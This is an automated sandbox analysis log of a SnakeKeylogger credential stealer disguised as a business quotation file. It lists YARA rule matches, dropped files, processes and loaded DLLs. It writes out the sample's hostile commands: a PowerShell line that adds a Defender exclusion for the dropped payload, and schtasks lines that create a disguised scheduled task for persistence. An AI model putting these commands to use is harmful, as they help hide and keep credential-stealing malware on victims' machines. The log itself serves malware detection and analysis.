                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 8.2.vTAuFgZcVE.exe.37ae800.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.vTAuFgZcVE.exe.37ae800.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 8.2.vTAuFgZcVE.exe.37ae800.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.vTAuFgZcVE.exe.37ae800.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 8.2.vTAuFgZcVE.exe.37ae800.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 8.2.vTAuFgZcVE.exe.37ae800.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: QUOTATION REQUIRED_Enatel s.r.l..bat.exe PID: 5748, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: vTAuFgZcVE.exe PID: 6752, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: vTAuFgZcVE.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@16/11@6/5
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeFile created: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMutant created: NULL
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeMutant created: \Sessions\1\BaseNamedObjects\iUpstagROQblp
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4128:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5396:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6152:120:WilError_03
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeFile created: C:\Users\user\AppData\Local\Temp\tmp9C5C.tmpJump to behavior
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: vbc.exe, 00000007.00000002.4059070573.0000000007629000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.00000000071C8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exeReversingLabs: Detection: 39%
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeFile read: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe"
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmp9C5C.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmpA824.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmp9C5C.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmpA824.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeSection loaded: version.dllJump to behavior
